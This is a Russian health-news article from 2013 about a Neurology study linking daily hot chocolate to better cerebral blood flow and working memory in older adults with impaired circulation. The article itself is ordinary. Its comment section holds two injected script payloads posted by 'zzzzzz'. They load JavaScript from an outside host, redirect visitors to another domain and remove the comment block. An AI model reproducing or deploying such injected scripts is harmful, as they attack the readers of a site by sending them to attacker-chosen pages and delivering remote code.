Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Горячий шоколад защищает ...  >>  Горячий шоколад защищает мозг
 
Обратная связь
 

Горячий шоколад защищает мозг

Размер шрифта
10 октября 2013 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Горячий шоколад – напиток не слишком-то популярный в нашей стране. А зря! Как выяснили ученые из Америки, регулярное употребление горячего шоколада не дает вашему мозгу зарасти мхом.

Горячий шоколад защищает мозг

В исследовании приняли участие 60 человек (средний возраст – 73 года) без признаков старческого слабоумия. Участники выпивали по две кружки горячего шоколада в день на протяжении месяца, при этом употребление любых других форм шоколада исключалось.

После этого испытуемые проходили ряд тестов, оценивающих память и мышление. Кроме того, ученые измеряли мозговой кровоток с помощью ультразвуковых датчиков.

«Изучая кровообращение в головном мозге мы обнаружили немало нового и интересного», – рассказывает Фарзане Соронд, один из авторов исследования, научный сотрудник Гарвардского медицинского университета в Бостоне и член Американской академии неврологии. «Участок мозга на пике своей активности нуждается в большом количестве энергии ровно в той же степени, что и в повышении интенсивности кровотока. Этот феномен называется «нейроваскулярная ассоциация», и он играет огромную роль в развитии таких заболеваний, как болезнь Альцгеймера».

У 18 испытуемых на момент начала исследования отмечался сниженный мозговой кровоток. К концу эксперимента ученые констатировали его улучшение в среднем на 8,3%. Помимо этих физиологических изменений  испытуемые демонстрировали заметный прогресс при выполнении тестов на память и мышление: продолжительность их рабочей памяти возросла в среднем до 167 секунд в сравнении с начальными 116.

При этом испытуемые с исходно ненарушенным кровотоком в мозге не выказывали аналогичного улучшения в исследуемых показателях.

Стоит также отметить, что участники получали горячий шоколад с неодинаковым составом. У половины напиток был обогащен антиоксидантом флаванолом, у остальных шоколад был самый заурядный. Впрочем, никакого влияния на итоговые результаты это разделение не оказало.

«Необходимы дальнейшие исследования, чтобы в деталях изучить связь между горячим шоколадом, мозговым кровотоком и когнитивными нарушениями», – говорит Пол Розенберг, профессор университета Джона Хопкинса в Балтиморе, автор редакторского комментария к тексту исследования. «Однако работа наших бостонских коллег является важнейшим первым шагом на этом интригующем пути».

Так что пейте, дети, горячий шоколад – будете здоровы!

Работа была опубликована в научном журнале «Неврология» («Neurology»).

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 19:00

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:58

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Ваша печень сжирает ваш мозг   Как первым увидеть в толпе звезду? У нас есть научный ответ!   Обычная витаминка против старости!   Бактерии управляют вашим настроением  
17 июля 2013Куда смотреть, чтобы мозг заработал? А заодно спасти близкого от инсульта 01 ноября 2013ИНВИТРО – «Марка №1» в России
 
21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт» 11 октября 2013Елена Малышева расскажет все о том, как правильно худеть
 

Слайдшоу

1
Лучшие десерты, приправы и закуски для мозгов
Как сохранить мозги в 40 лет
Как сохранить мозги в 30 лет

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.